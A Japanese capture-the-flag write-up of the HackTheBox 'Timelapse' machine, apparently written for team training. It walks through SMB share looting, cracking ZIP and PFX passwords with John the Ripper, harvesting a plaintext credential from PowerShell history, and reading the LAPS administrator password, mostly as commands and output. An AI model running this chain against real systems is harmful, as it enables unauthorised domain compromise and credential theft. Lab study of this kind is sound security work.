はじめに
本記事は自チームの技術力向上、攻撃者目線の醸成を目的としてHacktheBox(以下リンク参照、以降HTB)の「Timelapse」を解いた際のWriteupとなります。
初期探索
まずHTBのマシンでは攻略対象のIP(今回は10.10.11.152)が1つ与えられます。
このIPに対してポートスキャンを行い、空いているPortを探します。
nmap ポートスキャン
┌──(root㉿kali-linux-2022-2)-[~]
└─# nmap -n -Pn -v -sS -A 10.10.11.152 --top-ports 1000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-31 13:24 JST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:24
Completed NSE at 13:24, 0.00s elapsed
Initiating NSE at 13:24
Completed NSE at 13:24, 0.00s elapsed
Initiating NSE at 13:24
Completed NSE at 13:24, 0.00s elapsed
Initiating SYN Stealth Scan at 13:24
Scanning 10.10.11.152 [1000 ports]
Discovered open port 139/tcp on 10.10.11.152
Discovered open port 445/tcp on 10.10.11.152
Discovered open port 53/tcp on 10.10.11.152
Discovered open port 135/tcp on 10.10.11.152
Discovered open port 636/tcp on 10.10.11.152
Discovered open port 593/tcp on 10.10.11.152
Discovered open port 88/tcp on 10.10.11.152
Discovered open port 3268/tcp on 10.10.11.152
Discovered open port 3269/tcp on 10.10.11.152
Discovered open port 464/tcp on 10.10.11.152
Discovered open port 389/tcp on 10.10.11.152
Completed SYN Stealth Scan at 13:24, 11.79s elapsed (1000 total ports)
Initiating Service scan at 13:24
Scanning 11 services on 10.10.11.152
Completed Service scan at 13:24, 20.93s elapsed (11 services on 1 host)
Initiating OS detection (try #1) against 10.10.11.152
Retrying OS detection (try #2) against 10.10.11.152
Initiating Traceroute at 13:25
Completed Traceroute at 13:25, 0.21s elapsed
NSE: Script scanning 10.10.11.152.
Initiating NSE at 13:25
Completed NSE at 13:25, 40.10s elapsed
Initiating NSE at 13:25
Completed NSE at 13:25, 6.05s elapsed
Initiating NSE at 13:25
Completed NSE at 13:25, 0.00s elapsed
Nmap scan report for 10.10.11.152
Host is up (0.20s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-31 12:24:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-07-31T12:25:05
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h59m56s
TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 198.79 ms 10.10.14.1
2 199.00 ms 10.10.11.152
NSE: Script Post-scanning.
Initiating NSE at 13:25
Completed NSE at 13:25, 0.00s elapsed
Initiating NSE at 13:25
Completed NSE at 13:25, 0.00s elapsed
Initiating NSE at 13:25
Completed NSE at 13:25, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.67 seconds
Raw packets sent: 2087 (95.886KB) | Rcvd: 54 (3.262KB)
色々とPortが開いているが、Windows環境でよく見るPortです。
ldapのプロトコルからルートDSA固有エントリを取得する。
┌──(root㉿kali-linux-2022-2)-[~]
└─# nmap -p 389 -n -Pn 10.10.11.152 --script ldap-rootdse
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-31 13:32 JST
Nmap scan report for 10.10.11.152
Host is up (0.18s latency).
PORT STATE SERVICE
389/tcp open ldap
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=timelapse,DC=htb
| ldapServiceName: timelapse.htb:dc01$@TIMELAPSE.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=timelapse,DC=htb
| serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=timelapse,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=timelapse,DC=htb
| namingContexts: DC=timelapse,DC=htb
| namingContexts: CN=Configuration,DC=timelapse,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=timelapse,DC=htb
| namingContexts: DC=DomainDnsZones,DC=timelapse,DC=htb
| namingContexts: DC=ForestDnsZones,DC=timelapse,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 131224
| dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=timelapse,DC=htb
| dnsHostName: dc01.timelapse.htb
| defaultNamingContext: DC=timelapse,DC=htb
| currentTime: 20230731123235.0Z
|_ configurationNamingContext: CN=Configuration,DC=timelapse,DC=htb
Service Info: Host: DC01; OS: Windows
Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds
DCの情報が把握できました。dc01.timelapse.htbのようです。
次にWindows環境の情報を簡単に列挙できるツールを試します。
┌──(root㉿kali-linux-2022-2)-[~]
└─# enum4linux 10.10.11.152
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Jul 31 13:28:33 2023
=========================================( Target Information )=========================================
Target ........... 10.10.11.152
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.11.152 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 10.10.11.152 )================================
Looking up status of 10.10.11.152
No reply from 10.10.11.152
===================================( Session Check on 10.10.11.152 )===================================
[+] Server 10.10.11.152 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.11.152 )================================
Domain Name: TIMELAPSE
Domain Sid: S-1-5-21-671920749-559770252-3318990721
[+] Host is part of a domain (not a workgroup)
===================================( OS information on 10.10.11.152 )===================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.11.152 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=======================================( Users on 10.10.11.152 )=======================================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
=================================( Share Enumeration on 10.10.11.152 )=================================
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.11.152
============================( Password Policy Information for 10.10.11.152 )============================
[E] Unexpected error from polenum:
[+] Attaching to 10.10.11.152 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.11.152)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[E] Failed to get password policy with rpcclient
=======================================( Groups on 10.10.11.152 )=======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
==================( Users on 10.10.11.152 via RID cycling (RIDS: 500-550,1000-1050) )==================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
===============================( Getting printer info for 10.10.11.152 )===============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Mon Jul 31 13:29:31 2023
特段良い情報は得られませんでした。
では各プロトコルについて調査を開始します。
SMB
SMBのポートが開いているので、SMBの情報を取得します。nmapの主要なスクリプトを一気に回します。
┌──(root㉿kali-linux-2022-2)-[~]
└─# nmap -p 445 -n -Pn 10.10.11.152 --script smb-protocols,smb-os-discovery,smb-enum-shares,smb-enum-users,smb-enum-services
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-31 13:46 JST
Nmap scan report for 10.10.11.152
Host is up (0.18s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
Host script results:
| smb-protocols:
| dialects:
| 2:0:2
| 2:1:0
| 3:0:0
| 3:0:2
|_ 3:1:1
Nmap done: 1 IP address (1 host up) scanned in 16.34 seconds
SMBのプロトコル自体に脆弱性はなさそうなので、何かファイル共有されていないか調査します。
┌──(root㉿kali-linux-2022-2)-[~]
└─# smbclient -N -L \\\\10.10.11.152
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Sharesという共有階層があるようです。中身を見てみます。
┌──(root㉿kali-linux-2022-2)-[~/work]
└─# smbclient -N \\\\10.10.11.152\\Shares
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Oct 26 00:39:15 2021
.. D 0 Tue Oct 26 00:39:15 2021
Dev D 0 Tue Oct 26 04:40:06 2021
HelpDesk D 0 Tue Oct 26 00:48:42 2021
6367231 blocks of size 4096. 2462771 blocks available
何やら2つのフォルダ階層があるので、一括で取得します。
SMBでのファイル一括の呪文たちを投入します。
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \Dev\winrm_backup.zip of size 2611 as Dev/winrm_backup.zip (3.4 KiloBytes/sec) (average 3.4 KiloBytes/sec)
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as HelpDesk/LAPS.x64.msi (547.9 KiloBytes/sec) (average 397.9 KiloBytes/sec)
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as HelpDesk/LAPS_Datasheet.docx (130.6 KiloBytes/sec) (average 338.8 KiloBytes/sec)
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as HelpDesk/LAPS_OperationsGuide.docx (634.0 KiloBytes/sec) (average 403.3 KiloBytes/sec)
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as HelpDesk/LAPS_TechnicalSpecification.docx (92.2 KiloBytes/sec) (average 358.0 KiloBytes/sec)
smb: \>
ファイル取得に成功しました。
LAPSに関するファイルとドキュメント、あとはZIP圧縮されたファイルがあります。
ZIPファイルを解凍しようとするとパスワードを聞かれるので、このパスワードをクラックしていきます。
クレデンシャル情報搾取
zip
パスワード付きZIPファイルのパスワードを割り出すためにJohn the Ripperを利用します。
まずはjohnで解析できるハッシュ形式へ変更します。
┌──(root㉿kali-linux-2022-2)-[~/work/Dev]
└─# zip2john winrm_backup.zip > zip.hash
Created directory: /root/.john
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
johnで解析します。
┌──(root㉿kali-linux-2022-2)-[~/work/Dev]
└─# john --wordlist=./rockyou.txt zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2023-07-31 14:03) 3.030g/s 10724Kp/s 10724Kc/s 10724KC/s tabatha916..stefronc
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
パスワードがsupremelegacyとわかりました。
このパスワードを使ってZIPファイルを解凍します。
解凍に成功するとPKCS12形式のファイル(pfxファイル)が出てきます。
このファイルがクライアント署名書であれば秘密鍵抽出し、対象マシンへログインできそうです。
ただこの抽出にもパスワードが必要なので、このpfxファイルのパスワードをクラックします。
pfx
先ほどと同様に解析できる形式へ変換します。
┌──(root㉿kali-linux-2022-2)-[~/work/Dev]
└─# pfx2john legacyy_dev_auth.pfx > pfx.hash
johnで解析します。
┌──(root㉿kali-linux-2022-2)-[~/work/Dev]
└─# john --wordlist=./rockyou.txt pfx.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 ASIMD 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:02:34 DONE (2023-07-31 14:12) 0.006467g/s 20902p/s 20902c/s 20902C/s thyriana..thsco04
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
パスワードがthuglegacyとわかりました。
このパスワードを使って秘密鍵と証明書を抽出します。
必要な情報を得たので、winrmで侵入します。
侵入に成功しました。これでuser.txtのフラグをゲットできます。
横展開
LAPS_Readers
権限昇格するためのヒントはSMBの調査段階で拾っていました。LAPSでの権限昇格だと睨んでいました。
そこで以下のドキュメントを参考にします。
まずLAPS_Readersグループに所属しているかどうかを確認します。
*Evil-WinRM* PS C:\Users\legacyy> net user legacyy
User name legacyy
Full Name Legacyy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/23/2021 12:17:10 PM
Password expires Never
Password changeable 10/24/2021 12:17:10 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/31/2023 6:16:31 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users *Development
The command completed successfully.
LAPS_Readersグループに所属していないようです。なので、別途調査が必要です。
情報列挙
手動列挙で情報取集は厳しいので、winPEASを利用します。
*Evil-WinRM* PS C:\Users\legacyy\Desktop> .\winPEAS.bat
winPEAS.bat : The system cannot find the batch label specified - SetOnce
+ CategoryInfo : NotSpecified: (The system cann...ified - SetOnce:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
The system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLine by carlospolop
The system cannot find the batch label specified - T_Progress/!\ Advisory: WinPEAS - Windows local Privilege Escalation Awesome Script
The system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLine
The system cannot find the batch label specified - ColorLineThe system cannot find the batch label specified - ColorLine [i] Check for vulnerabilities for the OS version with the applied patches
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
Access is denied.
The system cannot find the batch label specified - T_ProgressERROR:Description = Access denied
Access is denied.
The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine [i] You may need to adjust your local date/time to exploit some vulnerability
Mon 07/31/2023
06:29 AM
The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine [i] Check what is being logged
The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine [i] Check where are being sent the logs
The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine [i] Check what is being logged
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft Services\AdmPwd
AdmPwdEnabled REG_DWORD 0x1
The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine [i] Active if "1"
The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine [i] Active if "1" or "2"
The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine [i] Plain-text creds in memory if "1"
The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine [i] You need System-rights to extract them
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
CACHEDLOGONSCOUNT REG_SZ 10
The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1
The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLineERROR:Description = Invalid namespace
Checking for defender whitelisted PATHS
The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLinePowerShell v2 Version:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
PowerShellVersion REG_SZ 2.0
PowerShell v5 Version:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine
PowerShellVersion REG_SZ 5.1.17763.1
Transcriptions Settings:
Module logging settings:
Scriptblog logging settings:
PS default transcript history
Checking PS history file
Volume in drive C has no label.
Volume Serial Number is 22CC-AE66
Directory of C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
03/04/2022 12:46 AM 434 ConsoleHost_history.txt
1 File(s) 434 bytes
0 Dir(s) 10,084,839,424 bytes free
The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine [i] Maybe you find something interesting
The system cannot find the batch label specified - T_ProgressThe system cannot find the batch label specified - ColorLine [i] Interesting information?
...省略
何やらボコボコエラーが出てしまいますが、一部の列挙は成功しています。
この出力の中で気になる部分を発見しました。
Checking PS history file
Volume in drive C has no label.
Volume Serial Number is 22CC-AE66
Directory of C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
03/04/2022 12:46 AM 434 ConsoleHost_history.txt
1 File(s) 434 bytes
0 Dir(s) 10,084,839,424 bytes free
PS historyがあると言われているのでコマンドの履歴を見に行きます。
PS history
historyファイルの中身を確認します。
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> cat ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>
winrmでクレデンシャルを用い、コマンド実行していることがわかります。
このクレデンシャル情報を横展開してみます。
svc_deployのユーザでログインすることに成功しました。
権限昇格
LAPS
svc_deployのユーザがLAPS_Readersグループに所属しているかどうかを確認します。
*Evil-WinRM* PS C:\Users\legacyy> net user legacyy
User name legacyy
Full Name Legacyy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/23/2021 12:17:10 PM
Password expires Never
Password changeable 10/24/2021 12:17:10 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/31/2023 6:16:31 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users *Development
The command completed successfully.
14:46
*Evil-WinRM* PS C:\Users\legacyy> net user svc_deploy
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 12:12:37 PM
Password expires Never
Password changeable 10/26/2021 12:12:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/31/2023 4:31:08 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\legacyy>
LAPS_Readersグループに所属していることがわかりました。
これでAdminのパスワードを参照してみます。
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-ADComputer -Identity dc01 -property 'ms-mcs-admpwd'
DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName : dc01.timelapse.htb
Enabled : True
ms-mcs-admpwd : %tY%W@bweG9Vhb2+3+NA0t)C
Name : DC01
ObjectClass : computer
ObjectGUID : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName : DC01$
SID : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName :
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
参照できました。これでAdministratorのパスワードゲットです。
ログイン実施します。
ログインできましたが、root.txtのフラグがありません。
探索してみます。
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ../../
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
*Evil-WinRM* PS C:\Users> cd TRX
*Evil-WinRM* PS C:\Users\TRX> dir
Directory: C:\Users\TRX
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 3/3/2022 10:45 PM 3D Objects
d-r--- 3/3/2022 10:45 PM Contacts
d-r--- 3/3/2022 10:45 PM Desktop
d-r--- 3/3/2022 10:45 PM Documents
d-r--- 3/3/2022 10:45 PM Downloads
d-r--- 3/3/2022 10:45 PM Favorites
d-r--- 3/3/2022 10:45 PM Links
d-r--- 3/3/2022 10:45 PM Music
d-r--- 3/3/2022 10:45 PM Pictures
d-r--- 3/3/2022 10:45 PM Saved Games
d-r--- 3/3/2022 10:45 PM Searches
d-r--- 3/3/2022 10:45 PM Videos
*Evil-WinRM* PS C:\Users\TRX> cd Desktop
*Evil-WinRM* PS C:\Users\TRX\Desktop> dir
Directory: C:\Users\TRX\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/30/2023 11:04 PM 34 root.txt
*Evil-WinRM* PS C:\Users\TRX\Desktop>
変な階層にありましたが、これでroot.txtのフラグをゲットできました。
まとめ
以下の脆弱性によって、Administratorへ権限昇格ができました。
- SMBによるクレデンシャルファイルの公開
- クレデンシャルのハード入力
- ドメインコントローラーでのLAPSの設定